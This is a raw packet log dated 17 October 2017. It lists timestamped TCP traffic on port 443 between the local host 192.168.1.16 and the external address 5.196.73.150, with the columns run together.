Okt 17, 2017 21:54:27.869524002 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.876410007 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.876449108 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.876490116 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.876801968 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.890017033 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.890039921 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.890048027 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.890224934 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.924582005 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.924604893 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.924612999 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.924750090 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.926080942 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.926229000 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.926418066 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.926434994 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.926445961 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.926609039 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.926625967 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.926738977 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.926759958 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.927282095 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.927298069 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.928394079 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.936213017 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.936235905 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.936429977 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.944206953 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.944230080 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.944237947 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.944473982 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.948012114 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.948035002 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.948044062 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.948208094 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.953593969 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.953615904 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.953624010 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.953768969 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.958684921 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.958708048 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.958714962 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.958863020 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.959130049 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.959269047 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.962146044 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.962169886 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.962177992 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.962311029 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.963777065 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.963799000 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.963807106 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.963948965 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.964682102 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.964704037 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.964843988 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.000607967 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.000631094 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.000638962 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.000797033 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.002322912 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.002343893 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.002352953 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.002629995 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.008022070 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.008044958 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.008054018 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.008203983 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.013643980 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.013668060 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.013675928 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.014118910 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.014139891 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.014596939 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.030814886 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.030823946 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.030827045 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.030956984 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.062158108 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.062180996 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.062189102 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.062371016 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.062975883 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.063087940 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.063366890 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.063385010 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.063455105 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.063585043 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.063601971 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.063611984 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.065107107 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.083791018 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.083813906 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.083822012 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.083944082 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.087528944 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.087553024 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.087560892 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.087667942 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.093986988 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.094008923 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.094409943 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.094556093 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.094578981 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.094590902 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.095148087 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.102437973 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.102461100 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.102468967 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.102547884 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.107795954 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.107824087 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.107831955 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.108192921 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.110057116 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.110080004 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.110088110 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.110168934 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.116945028 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.131767035 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.131791115 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.131799936 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.131942034 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.144423008 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.144465923 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.144494057 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.144610882 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.144800901 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.144818068 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.144844055 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.145026922 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.145042896 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.145113945 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.145134926 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.145891905 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.147820950 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.147844076 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.147851944 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.147974968 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.159427881 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.159450054 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.159661055 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.164103985 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.164125919 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.164134979 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.164383888 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.197452068 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.197478056 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.197487116 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.197735071 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.198816061 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.198837996 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.198846102 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.199117899 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.199989080 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.200010061 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.200018883 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.200162888 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.200474977 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.200619936 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.202663898 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.202689886 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.202697992 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.202792883 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.215382099 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.215409994 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.215418100 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.215672970 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.222479105 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.222501993 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.222697020 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.234074116 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.234097004 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.234106064 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.234478951 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.235055923 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.235079050 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.235088110 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.235379934 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.269090891 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.269098997 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.269103050 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.269428968 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.281450987 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.281631947 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.285257101 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.285279036 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.285286903 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.285461903 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.288547993 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.288662910 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.293251991 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.293273926 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.293282032 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.293404102 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.295689106 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.295715094 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.295723915 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.296096087 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.299537897 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.299561024 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.299680948 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.299716949 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.299732924 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.299743891 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.300040960 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.302582979 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.302607059 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.302614927 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.302860975 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.303122044 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.303144932 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.303155899 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.303210974 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.303828001 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.304034948 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.304526091 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.304546118 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.304553986 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.304975033 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.305946112 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.306030035 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.306447029 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.306464911 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.306473017 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.306638956 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.323637962 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.323658943 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.323668003 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.323924065 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.324944019 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.324966908 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.325305939 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.332596064 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.332618952 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.332627058 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.332637072 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.332662106 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.333053112 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.333071947 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.333447933 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.333563089 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.333585024 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.333596945 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.333995104 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.334011078 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.334460020 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.347867966 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.347876072 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.347881079 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.348259926 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.355079889 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.355362892 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.355384111 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.355556965 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.355587006 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.355920076 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.355942011 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.356072903 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.356096983 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.356587887 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.356612921 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.357032061 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.362235069 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.362257957 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.362672091 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.375804901 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.375828028 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.375835896 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.376089096 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.391438961 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.391463041 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.391472101 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.391597033 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.397515059 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.397538900 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.397547007 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.397654057 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.412663937 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.412688017 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.412699938 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.412811995 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.413244963 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.413573027 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.414486885 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.414508104 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.414516926 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.415285110 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.417195082 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.417220116 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.417227983 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.417299986 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.418232918 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.418253899 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.418440104 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.419589996 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.419609070 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.419617891 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.419964075 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.421067953 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.421091080 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.421098948 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.421200037 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.421571970 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.421588898 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.421597004 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.422014952 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.422033072 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.422066927 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.422090054 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.424562931 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.425154924 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.425251961 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.425739050 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.454128027 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.454267979 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.456691980 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.456713915 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.456722021 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.457134008 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.458178997 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.458205938 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.458213091 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.458539009 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.459050894 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.459074020 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.459305048 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.461059093 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.461066961 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.461071968 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.461209059 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.461230993 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.461406946 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.461427927 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.461987019 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.477088928 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.477097034 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.477101088 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.477402925 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.484116077 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.484266996 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.485826969 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.485851049 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.485858917 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.486212015 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.486232996 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.486681938 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.491831064 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.491854906 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.491863012 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.491978884 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.497838020 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.497860909 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.497869015 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.498192072 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.499139071 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.499165058 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.499171972 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.499471903 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.521509886 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.521532059 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.521539927 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:28.521653891 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:28.521830082 MESZ443491935.196.73.150192.168.1.16
